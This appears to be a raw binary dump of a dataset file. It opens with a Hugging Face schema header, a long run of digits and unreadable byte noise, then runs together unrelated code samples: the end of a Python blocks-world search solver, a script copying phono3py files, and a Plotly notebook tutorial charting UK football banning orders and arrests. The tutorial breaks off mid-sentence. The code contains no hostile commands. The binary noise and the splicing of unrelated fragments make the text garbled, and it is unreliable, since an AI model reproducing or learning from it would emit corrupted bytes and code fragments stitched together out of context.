�����    �   huggingface�{"info": {"features": {"id": {"dtype": "string", "_type": "Value"}, "text": {"dtype": "string", "_type": "Value"}, "dataset_id": {"dtype": "string", "_type": "Value"}}}}p4���� dataset_id��������text���� id����  �M   �� ����+�+�0;�L�L�L���L8J���%,3:AGNU\cjqx������������������ %,3;BJPX_fmry������������������  '.5<DLS[agnu|������������������ !(/7=DKRY`gow~�����������������$+19AHPX_elt{������������������ %,3:AHPW_fms{������������������ "*18?GOV]dksz������������������'/6=DKRX_fmt{������������������ &.5=DKQW^ekry�������������������   ! ( / 6 < C I P X _ f m t { � � � � � � � � � � � � � � � � � �     # + 2 9 @ H P V ] d l s z � � � � � � � � � � � � � � � � � �    ' / 7 > E L S Z a h n v ~ � � � � � � � � � � � � � � � � � �     $ + 3 ; B H P V ] d k r y � � � � � � � � � � � � � � � � � �     % , 3 : B I P W ^ e l s z � � � � � � � � � � � � � � � � �  %,3:AHOV]dkry������������������$+18?FMT[bhov~�����������������&-4;BIPW^emt{������������������ ")08?FMT[cjqw~������������������&,3;@GOV]dksz������������������� ")07>ELSZaipw�����������������%+3:AHPX`gov}������������������")07>DKRZaipx������������������ !)08?FMU\bipw�����������������%,3:AIPW^elsy������������������$+3;AIPX`gnu|������������������ !)07>FNU]dkrz������������������%-4;BIQW^dlsz������������������$,4;BJRW^emt|��������������115056328235381486712810323458901190372002674054497890016922185058418471522130714429060063247594241863075617695384078519651385712590871537670064830063039339663289150824818646115622136761382438183277688566877360666036347931463062599659945758689481903015543005104575635887634261937874871262609431685006581772012110355842798610035668434365106754333376983146692089063549366929158021195474087685542458514427888710062558110121258332105117281568019736817069885434747269073102386429526843619897230913310880862117769952225487251156223568951084330361655157550683008791157880971355801278906312532259913771510801746554274787012677373346540109386861411911895565431220323260835295541901976650284720338293899263595361056191196644184778171092266677893699097675684039644141269183255559081022394185808661171583611451947468009115750651257407189767978255774501357642999282576215388003408426010246361115177005593523124420107384651900876292059366941707987448841113481188120372421421737184740980961693781270939159594781172600171266349970415126197891324377251370481336605782039662597899705541776891158264911736103879452212841545116678638434092841917718627210393709976772488636731062921511416247111299051254144914375299430218257747652596894774438581191454044111471248225554512293424160691008440664984611727334414562777302112771844676314064216559453852960806157319720349238517421021340035682791081435362429062566211241151114517351047695364470414607343238707312321409643802997879525677413104337557772874707579212591256127170729706261770789117616716852598119488622460589685474084880919505177807544211070991378546479236094790539124265871159176429987601454819937087393980081029353442828335599546831327123350796239225332897147735464038901006352103344636078773131390711653820491587612553171693163464898147403007774528054485822333004121264528626112110911061272451812291693277350131376366103917532963034442239547909569911762529897441164560113533783231053165205063767264415858476823014528843150828810402119106368452952922638528411442951375911984978038697296136970422097185007536125804621281681376968122365582525873559710512248053115895112110046928939458991269762865916286908491606118435390595166487900184829184112189699158601678433946095660919176140833911264858218912088023702243624269391885104313679221560237845180451807910596511489314109715909600840603398243367844009503871024899833647527780305972954347070434326038521020815710541758154915947114594093777286029124371542069735285501612262112873391821091332424505100167631053360122309699282744302939428331949302230750579281758793156025113764381095524910415673923167310529919624870113313719637241444443252977861125301811875450528504182618892600051063455478531151210389568391212787555128150838982434425128725391881213715127057521117972991980561034541785439358810174160122014746403624674419952359270249259752766906538762457007281152962774304361167085312836753349093788268736195980371401251026368341530998609917596312460957110832749287530923634240809924691044704538124169511802153878240784892475823751492391867653721502397664575698334775504952551411273159981008461000910676006594638285567098372229152074310383853115758268104893306876118287902597098294430724001489845104244953855790442109091140493597611201083725262030720690181080014876106811118317711456934504914289058425694629128608715919930846376243846728931401274667880605547747240295003397488619015988606430506853085037451006189794156949858267457236957713255944711602668587857686420518109702891286651175931448190832935873110896935124837910763536122979679436597540240573748521132928312706425477268911620898929195510488613106543672938168433132141524726150391748710894042123051943673635826590701040569632415494615953072537469309953543413170693412166376770836461662635575087835674857724311096987606213675449214891861426859737268645070557236147284184112123371158541335169664182364927627978689741246862094111096047144761339087280264522774407169802822241456423593271734942732942399044249018786191431511076818991798698384473335122864335101174971070221045630381036831610700152600787646686525006181123385784865015216438115501671209182703626610739341020520311225882126498096655209917592069905054559505670851243894396499518274175671013458593789108034976245268846108219427189329449927181112219281019380412714701516230710033845313824596543931266861115377627934148972647232760568210741089607512736895200065910689370144556180258965392732736935255149571223939716818542439522931559994821194499935116944788158429766500064164466814421046125780967845411196351069974574873491081827270916563214667754851631096152112778189285886862617724079183683728422821296068177108150133029402593645280612536646127061187695696177315125940678498873371621282312217083767868210789879496744671255815958768012547171851601720976236074638621085732047985195126523119151094192308103405321903415657278148333261067962430714591142820607018485644743131770121916629258256924466719270286392130745642376678909609469694256734036651731460574264160859881143155288425502437781125219117324492125856804979650126633221899123356297243968923049178204733811082193284718242095754997736666380998014826202084115556027075976346899965340859239359128651533531942117569105977445794694819208177729561093252712343271103678609242682128148695440776501901864001638867942043056279413628659556481460133477311381292451499404248947560718404121752551100702544985027807018116613072524941688193157020583287689621162691604466267633219675198826795675926979316171701859147640917711426375316147110148882896525110382142964926348016566425241098708640010811133365780262125971363318389393814973114908287817136296611601611777314215181311716643563148988130626927197309182693280731108732236961710840856236022910948840660574857965813428432109060632777252600729479992050022592772583114899661052853243359923018728285584145353799827080110019175456508283065777940244924594903023122913461228818967702525740280505928758900157675428110024025639299118508609187875301283715993198605567903565610080268412467429556192430085668201138851272479224294613881968812089441046472136866484177609880328642693049547141083428010790192127339714002348551230559311161272383358637261826937736245474660164007667496792067018120779728996327888486510258430127486721242481059491052056211087922811966497779217421768229277553593345512449966274958778151771992513399424249291579425398706812810398732119330082211513398241698411563770015647598854811712382495124560367336165339036290171422443811112644011358044772479243257413681579107393011268090583968981096593684181721092959146656312479571376994634455669442873140394911809603435664915152847380637176443946398162088277549647397531192582223327569696169596318488322512727445541265357089794752222947103635863519700125815788057328636173293681407225013127012926660741689580530934120175908916552521167912460826243231055409591885031212646843713327528486346842284321498300619295516604660220020748779055120331052031562363933161262361568659289669310790973836688659875189019374126194121177553670263347027574101336301215238346532769710734215061205657117337531282370051840411994251931511058038051119074738428055960368000779235018276557229846498365799145481292564431p� p�������<�������Z��7  G)$*�RVV�_�a;fUh��ĕ/�I������<�LN�Y�b�d�~���{�d�š�����w׳N���!�^����j�������e�N#$�<�l��e�£ �������� 1I`~g����t���M� �E! <<(?)�4�D�G�XKeh�~��Ĉ����$�������!�S�� 8# x$ �$ ^' �( pH �L �N b �c Mm �q �t �u �� �� �� �� �� �� 1� � [� � �� �� � � � � u4 �5 z8 �� ;� Ѷ �� �� ޻ &� a� �� 6� x� p� �  �3 �= �A �S p Ap �� Π ۤ � � �� �E G |G �Y &| �� � ֔ r� ٟ � �� �� D� �� I� g =2 �5 �C � �CC a(L)g.�7�C�P�P\cN���˰o�3�4���W��p�q������c���>�?��#q' /�7�AcBI�I�J�Y�\�fJ����M".%])�,�2h=�B)C7E�E�`�a8b6v�|����ֹ���Q��+ �%�����0�0������������������s��aiv%jg�n�o�uIy �B�|�������� �9�QKR�Wyc�c�n�������R��5�5p<CF�����4�65IgNSV�Y `(a!c�f�m��~�������Q���̯@�q���*��VZ�\ddh�w�x"��c��̬ ����ݺt�=�����2�JPgm�m�.�P���5��36�I;K� �������5�EU��i�����F�y�g�����8+�7?�F��͊�Ŗ��ۛ)���̻������-���c�$�(�q��/���Z�%�m��\ L<�OTc/jil�m����ɤ}���Թ��l����������| � X$ �& b. �G �P #S �Z �c :j �k o� я �� 6� ȝ �� � ~� �� -� �� U� �� �� s!z!�U!�\!��!g�!��!��!�!h�!��!�!l�!S�!Y�!W�!G�!)�! "�"�a"�i"#n"6r"�"��"§")�"��"��"��".�"5�"��";�"�":�"M�"�"�#�#� #�#�##�$#�'#�4#�;#&B#�G#�P#�W#�_#@`#b#\f#2�#��#��#`�#�#�#��#�#�$� $ '$7$�:$];$�<$?`$#e$�t$Bw$��$\�$~�$��$��$��$-�$`�$��%��%�%S�%&�!& +&%?&�D&bN&=X&�[&c&�l& �&��&��&ب&ެ&�&�&�'�'� '�' '('"o'�u'@v'�'P�'�'O�'ޟ'�'��'[�'»'��'��'�'��'P�'e�'��'�(R?(-B(�C(��(�( �(�( �( �(��(��(e�(7�(_ )�)e")L%)�()�,)<0)�1)FF)m)�m)�p)�s)��)&�)�)��)Ǡ) �)�)��)#�)L�)��)�*�*�*�*�(*�H*�I*{K*gM*�U*�X*d~**^�*�*'�*��*��*/�*@+�+�k+�l+�q+5s+�s+ z+{z+*�+y�+�q0_�0>�0�0L�0(�0��0��0 �0��0��0��0��0�0)�0��0��0 1o1q:1{=1�Z1�[1�g1A�1A�1��1>�1`�1�1��1c�1��1^�1� 2Q2�2�s2�t2�y2Xz2ˈ2J�2��2�2ػ2��2P�2K�2��2�2.�2�3�3:3S$3`03T43 X3'Z3�i3�s3Յ3=�3��3Ï3%�3��3��3�3��3l�3+�3G�3<�3�3��3H�3��3!�38�3��34�3_�3�4j�4��4��4P�4��4!�4��4��4B�4"565 5X5�5�$5y05�15�:5�E5j5,p5��55�5O�5E�5:�5��5��5��5�50�5��5��5��56F 6�6�6�Y?;Z?a?�@�@�@�@! @�(@�/@K@ ]@�a@�z@�|@��@�@'�@$�@��@!;Ag=AZBAhDA�EA]PA�UA�A�A��AT�A��A�A��A��A�!B�#B�/B NB9NBMPB�^B�^BoBY�B��BjC�COCfC��C_�C�C��C8�C��C�C��C��C6D�rD0�Df�Dv�D��DӸD�D��D��D��Dy�DJ�D �D�E�E�EE�E�E�$E)%ET)E�,E�:E�@E�FEIE!JE�JENKETpE {E�~E=�E`�E�Ek�E_�E{�E�E��E�E�E��EBFF�8F?EF�EF�IFàF��F��F��F��F��F�.G�;GrDG�FG�SGtUG�\G�aGUbG�dGjG�mG�qG�rG}�G{�G�G��G5�G��G�G�)Hz5H�7H\ 4: print('Usage:\npython3 {} [solution_file_name]' .format(argv[0])) exit(1) problemFile = argv[2] outputFile = '' if len(argv) == 4: outputFile = argv[3] init, goal, cubes = openProblem(problemFile) # Initialize inital and goal states. initialState = State(init) goalState = State(goal) algorithm = argv[1] t1 = perf_counter() if algorithm == 'breadth': solution, iters = breadthFirstSearch(initialState, goalState) elif algorithm == 'depth': solution, iters = depthFirstSearch(initialState, goalState) elif algorithm == 'best' or algorithm == 'astar': solution, iters = heuristicSearch(initialState, goalState, algorithm) else: raise Exception('Unknown algorithm. Available : breadth, depth, best, astar') t2 = perf_counter() print('| Problem name: {}' .format(' ' * 10 + problemFile)) print('| Algorithm used: {}' .format(' ' * 8 + algorithm)) print('| Number of cubes: {}' .format(' ' * 7 + str(len(cubes)))) print('| Cubes: {}' .format(' ' * 17 + str(' '.join(cubes)))) if solution: print('| Solved in: {}' .format(' ' * 13 + str(t2-t1))) print('| Algorithm iterations: {}' .format(' ' * 2 + str(iters))) print('| Moves: {}' .format(' ' * 17 + str(len(solution)))) print('| Solution:' + ' ' * 15 + 'Found!') writeSolution(solution, outputFile) else: print('| Solution:' + ' ' * 15 + 'NOT found, search timed out.') if __name__ == '__main__': main(argv) tools/AI-MD/createphono3py-2-LC7.py # -*- coding: utf-8 -*- import os import shutil """ This script is for copying 3 files of /predict-phono3py folder to /predict-phono3py-2 folder in order to run phono3py again by new prediction_application.py which is added saving symm_func to npz file """ def fileEdit(datadir): copiedfile=['POSCAR-unitcell','phono3pyPrep.py','phono3pyRun.py'] os.makedirs(datadir+"/predict-phono3py-2") dirorg = datadir+"/predict-phono3py/" dirdest = datadir+"/predict-phono3py-2" for cpf in copiedfile: shutil.copy2(dirorg+cpf, dirdest) if __name__ == '__main__': root="/home/okugawa/HDNNP/Si-190808-md/1000K-LC7n/" grps=['0.95','0.97','0.99','1.0','1.01','1.03','1.05','mix'] for grp in grps: for i in range(1, 11): if grp=='mix': for j in range(1, 11): datadir=root+grp+"/"+str(i)+"/"+str(j) fileEdit(datadir) else: datadir=root+grp+"/"+str(i) fileEdit(datadir) print(f'Copied phono3py-2 of /1000K-LC7/{grp}') # coding: utf-8 # # Dashboards (3) - Football Hooligans in the UK # In this final lesson on dashboards, we're going to make our most complex dashboard yet. # # We're going to make a dashboard which explores the phenomenon of football hooligans in the UK. I'm not a big football fan, but this is a very rich and interesting dataset which I'm sure you'll enjoy exploring. # # There's a few things you should know before we begin. Football in the UK takes places over several leagues. The highest league is the Premiership, then the Championship, then yo have Leagues 1 and 2. Teams play each other twice, once in each home city. There are also parallel knockout competitions as well as international matches. Some people really love football. # # Our dashboard will have 12 cells in 3 rows of 4 and we're going to use an offset-grid style which you can see in the image below. # # The top-left chart will be a table showing the football clubs whose fans have the most and least banning orders, whilst the top right pie chart will show the breakdown of banning orders by competition. # # The middle-left bar chart will show the number of arrests per 100,000 attendees, broken down by competition whilst the middle-right chart will show how the number of offenses has changed over time. # # Finally, the bottom-left bar chart will show how the types of offenses change depending on the competition whilst the bottom-right pie chart will show the split of offenses by whether the team was playing at home or away. # # The plan of our dashboard is shown below: # # ## Module Imports # In[5]: #plotly.offline doesn't push your charts to the clouds import plotly.offline as pyo #allows us to create the Data and Figure objects from plotly.graph_objs import * #plotly.plotly pushes your charts to the cloud import plotly.plotly as py #pandas is a data analysis library import pandas as pd from pandas import DataFrame # #### New Modules: # # Because we're making a table, we need to get the create_table() function from the Figure Factory. You may remember that we have to put a table in a dashboard in a very specific way, without using the make_subplots(). # # Regardless, we'll import the make subplots to help us apply the complex layout of the dashboard. # In[6]: from plotly.tools import FigureFactory as FF, make_subplots # In[7]: #lets us see the charts in an iPython Notebook pyo.offline.init_notebook_mode() # run at the start of every ipython # ## Getting the data # # I have prepared five datasets for us to use to make this dashboard. They all come from different tables in the same source dataset. Let's have a look at them before we start: # #### Number of banning orders by club and league # We'll use this dataset to create the table and pie chart in the top row of the dashboard. The charts will show respectively, the best and worst clubs for banning orders, and the best and worst competitions for banning orders. # In[8]: banningOrders = pd.read_csv('http://www.richard-muir.com/data/public/csv/BanningOrdersByClubAndLeague.csv', index_col = 0) banningOrders.head() # #### Arrests per 100,000 attendees # # We'll use this dataset to create the bar in the middle-right cell of the dashboard. This chart will show the number of arrests per 100,000 attendees broken down by competition. # In[9]: arrests = pd.read_csv('http://www.richard-muir.com/data/public/csv/ArrestsPer100kByLeague.csv', index_col = 0) arrests.head() # #### Offenses by year and league # # We'll use this dataset to create the line chart showing the time series of the number of offenses by league. This chart will go in the middle-right cell. # In[10]: offenses = pd.read_csv('http://www.richard-muir.com/data/public/csv/OffensesByYearAndLeague.csv', index_col = 0) offenses.head() # #### Types of offense # # This dataset shows the types of offense, broken down by competition. We'll use this to create the grouped bar chart in the bottom-left cell. # In[11]: typesOffense = pd.read_csv('http://www.richard-muir.com/data/public/csv/TypesOfOffensesByLeague.csv', index_col = 0) typesOffense.head() # #### Arrests at home and away # # This dataset shows the number of arrests at home, away and neutral football matches. We'll use this to create the pie chart in the bottom-right corner; # In[12]: homeAway = pd.read_csv('http://www.richard-muir.com/data/public/csv/ArrestsAtHomeAndAway.csv', index_col = 0) homeAway.head() # ## (2) Making the table # # If you're following along with the videos, this is where the second lesson starts. # # We're going to make the table which shows the five best and worst performing clubs by the number of arrests their fans have. # # We need to make this table first, and then add all the other charts around it, but let's get the styling right for the table before we go any further. # # We need to take the top and bottom five clubs from the dataset and save them as new DataFrames. The dataset is already sorted, so we can use DataFrame.head() and DataFrame.tail() to get the rows we need. # # We're also going to make a spacing row as its own DataFrame. We'll use this to separate the top and bottom five clubs to indicate to the reader that there are many more. # # We can then concatenate these three tables together and add in some spacing columns to reduce the size of the index column. # In[13]: top5 = banningOrders.head(5) bottom5 = banningOrders.tail(5) middle = pd.DataFrame.from_dict({'League' : ['...'], 'Club' : ['...'], 'Banning Orders' : ['...']}).set_index('Club', drop = False) bestWorst = pd.concat([top5, middle, bottom5]) bestWorst[''] = '' bestWorst[' '] = ' ' bestWorst[' '] = ' ' bestWorst = bestWorst[['League','', 'Club',' ','Banning Orders', ' ']] bestWorst # Let's now make a Plotly table from this DataFrame. I'm calling it 'hooligans' because this object will eventually become our final dashboard. # # We want to set an index column and an index title, and reduce the height_constant slightly to compress the table a little. # In[14]: hooligans = FF.create_table(bestWorst, index=True, index_title='Rank', height_constant = 20,) pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-0.png") # # ### Styling the table # # Let's right-align the numbers in the Banning Orders column. We need to make sure that we don't select the numbers in the Rank index. # # We'll do this by only taking annotations that have an x-position greater than 3. The annotations in the Club column are all positioned at x = 2.55, so anything to the left of this will be in the Banning Orders column. # # In[15]: hooligans['layout']['annotations'][10] # In[16]: for ann in hooligans['layout']['annotations']: if ann['x'] > 3: ann['xanchor'] = 'right' ann['x'] += 0.9 pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-1.png") # # Let's now change the colour of the table. We're going to edit the colours used in the colorscale and z-index. # # Rather than alternating colours for the rows, we'll set the worst five clubs to be coloured different shades of red, and the best five to be in green and white. # # We'll also change the colour of the index text to be black and the background colour of the index cells to white. # In[17]: #Changing the annotation colour: for ann in hooligans['layout']['annotations']: if ann['font']['color'] == '#ffffff': ann['font']['color'] = 'black' pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-2.png") # # In order to change the colour of the cells we need to change the color_scale and the z-index of the cells. # # Let's change the colour of the index row and column first: # In[18]: hooligans['data'][0]['colorscale'][0][1] = '#ffffff' pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-3.png") # # Here's the green and red colour we'll use: # In[19]: red = '#E61A1A' green = '#1FAD39' # Let's now change the z-values for each row, and attach the relevant colour to the colorscale. # # We want each row to have a different z-index, but we'll leave the middle row in white. # # The values for the z-index must be spread out so that the colour scale doesn't fade quickly from green to red, instead, the first 5 rows should be slightly different shades of green, whilst the last five should be slightly different shades of red. # # By setting the z-index of the first five rows to be a small number, we're ensuring that these will be coloured green. The z-index of the last five rows is very large compared to the first. This means that the gradient of these rows will be applied properly # In[20]: for i, row in enumerate(hooligans['data'][0]['z']): # Setting the green rows if i != 0 and i < 6: hooligans['data'][0]['z'][i] = [0] + [i for j in range(6)] # Setting the white spacer row if i == 6: hooligans['data'][0]['z'][i] = [0, 0, 0, 0, 0, 0, 0] # setting the red rows if i > 6: hooligans['data'][0]['z'][i] = [0] + [i * 10 for j in range(6)] hooligans['data'][0]['z'] # Now let's change the colour scale. We need to make sure that the rows with a z-index of 0 remain white, but that the other rows will change from green to red. # # I've set the colorscale so that any rows with a z-index of 0 will be white, then, the rows with a low z-index will be green, and those with a high z-index will be red. # # Setting the zmin and zmax makes sure that the colours will be represented properly: # In[21]: hooligans['data'][0]['colorscale'] = [[0, '#ffffff'], [0.1, green], [1, red]] hooligans['data'][0]['zmin'] = 0 hooligans['data'][0]['zmax'] = 90 pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-4.png") # # ## (3) Creating the dashboard object # # For those following along with the videos, this is where the third lesson starts. # # Now we've created the initial table we can build the dashboard around it. We did this in the previous section with a single chart, but we're now going to add five more. # # We have to add the other plots by updating the domains and anchor points of the additional axes. Let's use the make_subplots() function to create a template which we can then apply to our dashboard. # In[22]: template = make_subplots(rows = 3, cols = 4, specs = [[{'colspan' : 3}, None, None, {}], [{'colspan' : 2}, None, {'colspan' : 2}, None], [{'colspan' : 3}, None, None, {}]]) template # Let's take the layout from our subplots object and transplant that into our table to get the axis domains right. # # First we're going to update the axes for the table. Let's also expand the height and width to the full size of the dashboard: # In[23]: hooligans['layout']['xaxis'].update(template['layout']['xaxis1']) hooligans['layout']['yaxis'].update(template['layout']['yaxis1']) hooligans['layout'].update({'height' : 1000, 'width' : 1000}) pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-5.png") # # Now, let's add in the other axes: # In[24]: for axis in range(2, 7): hooligans['layout'].update({'xaxis{}'.format(axis) : template['layout']['xaxis{}'.format(axis)]}) hooligans['layout'].update({'yaxis{}'.format(axis) : template['layout']['yaxis{}'.format(axis)]}) pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-6.png") # # # Adding the other charts # # For those of you following the videos, this is where the fourth lesson starts. # # Let's now add the other charts to our dashboard. # # ## (4) Banning orders by competition # # This pie chart will show the number of banning order by competition. We'll use the same DataFrame that we used for the table, but in order to get the total number of banning orders in each competition, we have to use the pandas.DataFrame.groupby() method to aggregate the data. We'll also sort the data in descending order. # In[25]: totalByCompetition = banningOrders.groupby(by='League', ).sum().sort_values(by='Banning Orders', ascending = False) totalByCompetition # Let's now make this pie chart. I'm going to set the colours for the six different competitions here as well. There are only four in this pie chart, but in the arrests per competition dataset, there are six. We want the colours for the competitions to be consistent throughout this dashboard. # # We're also going to set the legendgroup so we can space the legend items out, and set an insidetextfont and outsidetextfont so that the segment labels are nice and big. We'll also set the hoverinfo to just show the label, percent and value. # In[26]: competitionColours = ["rgb(228,204,241)", "rgb(132,109,255)", "rgb(246,131,218)", "rgb(216,160,108)", "rgb(93,54,118)", "rgb(154,16,115)"] banningOrdersPie = {'type' : 'pie', 'labels' : totalByCompetition.index, 'values' : totalByCompetition['Banning Orders'], 'hoverinfo' : 'label+percent+value', 'legendgroup' : 'banningOrderPie', 'insidetextfont' : {'size' : 16}, 'outsidetextfont' : {'size' : 16}, 'marker' : {'colors' : competitionColours[:4], 'line' : {'width' : 1, 'color' : '#333'}}, 'direction' : 'clockwise'} pyo.iplot([banningOrdersPie]) py.image.save_as([banningOrdersPie], r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-7.png") # # Now let's add this pie chart to the dashboard by setting the domain. I'm going to move it slightly to the right to prevent it overlapping the table. # In[27]: print(hooligans['layout']['xaxis2']) print(hooligans['layout']['yaxis2']) # In[28]: banningOrdersPie.update({'domain' : { 'x' : [0.78, 1.0], 'y' : [0.7111, 1.0]} }) hooligans['data'].append(banningOrdersPie) pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-8.png") # # Now let's remove the axis marks from the axes under this pie chart and from the axes in the bottom-right cell; we're going to put a pie chart there later. # In[29]: blankAxis = {'showline' : False, 'zeroline' : False, 'ticks' : None, 'showticklabels' : False, 'showgrid' : False} for axis in [2, 6]: hooligans['layout']['xaxis{}'.format(axis)].update(blankAxis) hooligans['layout']['yaxis{}'.format(axis)].update(blankAxis) pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-9.png") # # ## (5) Number of arrests per 100,000 attendees # # If you're following the video lessons, the fifth lesson starts here. # # Now let's add this bar chart showing, for each competition, the number of arrests per 100,000 attendees. We'll also plot a line showing the average so we can compare each competition to this average. # # Let's sort the arrests DataFrame by descending value and create a text column so we can format the number to two decimal places. # In[30]: arrests = arrests.rename(columns={'Arrests per 100,000 attendees (2015-16)' : 'Arrests'}, ).sort_values(by='Arrests', ascending = False) arrests['text'] = arrests.apply(lambda x: "{}
{:.2f} arrests per 100,000".format(x['Competition'], x['Arrests']), axis = 1) arrests # We now need to remove the 'Total' row from the DataFrame - we don't want to plot this as a bar, but we do need to keep the information so we can plot a line as an annotation. # # I'm also going to change the text for 'National League National Division', 'Football League Trophy' and 'European competitions' to reduce the size of the ticklabel. # In[31]: total = arrests.loc[10, ['Competition','Arrests']] total # In[32]: arrests = arrests[arrests['Competition'] != 'Total'] arrests.loc[4, 'Competition'] = 'National League' arrests.loc[7, 'Competition'] = 'Football League' arrests.loc[8, 'Competition'] = 'European' arrests # Let's now append this bar trace to the dashboard. We're going to colour red all of the bars that are above the average, and colour green those that are below. Only the last two are below the average (these are the two competitions with the largest attendance). # # We need to anchor this bar trace to the 'x3' and 'y3' axes: # In[33]: hooligans['data'].append({'type' : 'bar', 'x' : arrests['Competition'], 'y' : arrests['Arrests'], 'opacity' : 0.6, 'text' : arrests['text'], 'hoverinfo' : 'text', 'showlegend' : False, 'marker' : {'color' : [red for i in range(8)] + [green, green], 'line' : {'width' : 1, 'color' : '#333'}}, 'xaxis' : 'x3', 'yaxis' : 'y3'}) pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-10.png") # # Now let's add the average line and an explaining annotation to the layout. We'll also need to anchor both of these to the 'x3' and 'y3' axes. # # We're going to use an arrow to move the annotation away from the average line; it is difficult to read when the text is over the bars. By setting the 'ayref' and 'ay' parameters, we can move the annotation text away from the location where the arrow points. Because the 'ay' value is negative, the annotation will move up relative to the point of the arrow. # In[34]: hooligans['layout']['annotations'].append({'text' : "Average in all competitions: {:.2f}".format(total['Arrests']), 'showarrow' : True, 'ayref' : 'y3', 'ay' : -90, 'xanchor' : 'middle', 'x' : 5, 'xref' : 'x3', 'y' : total['Arrests'] * 1.05, 'yref' : 'y3'}) hooligans['layout']['shapes'] = [{'type' : "line", 'x0' : -0.5, 'x1' : 10.5, 'y0' : total['Arrests'], 'y1' : total['Arrests'], 'xref' : 'x3', 'yref' : 'y3'}] pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-11.png") # # Let's now style the axes for these plots. I'm going to change the domain of the x-axis slightly to allow room for the y-axis title. # In[35]: hooligans['layout']['xaxis3'].update({'tickangle' : 45, 'domain' : [0.05, 0.475]}) hooligans['layout']['yaxis3'].update({'title' : 'Arrests/100,000 attendees'}) pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-12.png") # # ## (6) Adding the line chart showing the change in the number of arrests # # For those of you following the video, the sixth lesson starts here. # # We'll now add the line chart which will give us a time series of the number of arrests in each competition. # # First I'll rename the columns to just show the year. I'll do this with a dictionary comprehension. # # I'll also change the league name for 'National League National Division clubs', as well as removing the word 'clubs' from every row. It's possible to do this using the pd.DataFrame.replace() method, but I had problems getting this to work, so I went for a guaranteed method! # In[36]: offenses.rename(columns={col : col[:4] if col != 'League' else col for col in offenses.columns}, inplace = True) for loc in range(6): offenses.loc[loc, 'League'] = offenses.loc[loc, 'League'].replace(" clubs", '') offenses.loc[4, 'League'] = 'National League' offenses # Finally, before we plot this, we're going to transpose the DataFrame to make it easier to plot. Let's set the index to be the League column, then call DataFrame.T to switch the row and column indexes round: # In[37]: offenses.set_index('League',drop = True, inplace = True) offenses = offenses.T offenses # Now let's plot this line chart, not forgetting to set the xaxis and yaxis reference to x4 and y4 respectively. # In[38]: lines = [] years = list(range(2011, 2016)) for i, comp in enumerate(offenses.columns): lines.append({'type' : 'scatter', 'mode' : 'markers+lines', 'x' : years, 'y' : offenses[comp], 'marker' : {'color' : competitionColours[i], 'size' : 8, 'line' : {'width' : 1, 'color' : '#333'}}, 'name' : comp, 'legendgroup' : 'offensesLineChart', 'xaxis' : 'x4', 'yaxis' : 'y4' }) hooligans['data'] += lines pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-13.png") # # Much as we did for the previous chart, I'll now change the domain on the xaxis to make space for a yaxis title: # In[39]: hooligans['layout']['xaxis4'].update({'domain' : [0.55, 1],}) hooligans['layout']['yaxis4'].update({'title' : 'Arrests'}) pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-14.png") # # ## (7) Types of offense by competition # # The seventh video lesson starts here. # # We'll now populate the bottom-left cell with a bar chart showing the number of each type of offense by competition. # # We've got to prepare the DataFrame before we can plot it. # # I'll firstly change the name of 'National League National Division'. # # Next I'm going to set the index to the Competition column so we can more easily loop through the columns of offenses. # # Next, we'll sort the columns from most offenses to least. For simplicity we'll only sort based on the 'Premier League' row. To sort the 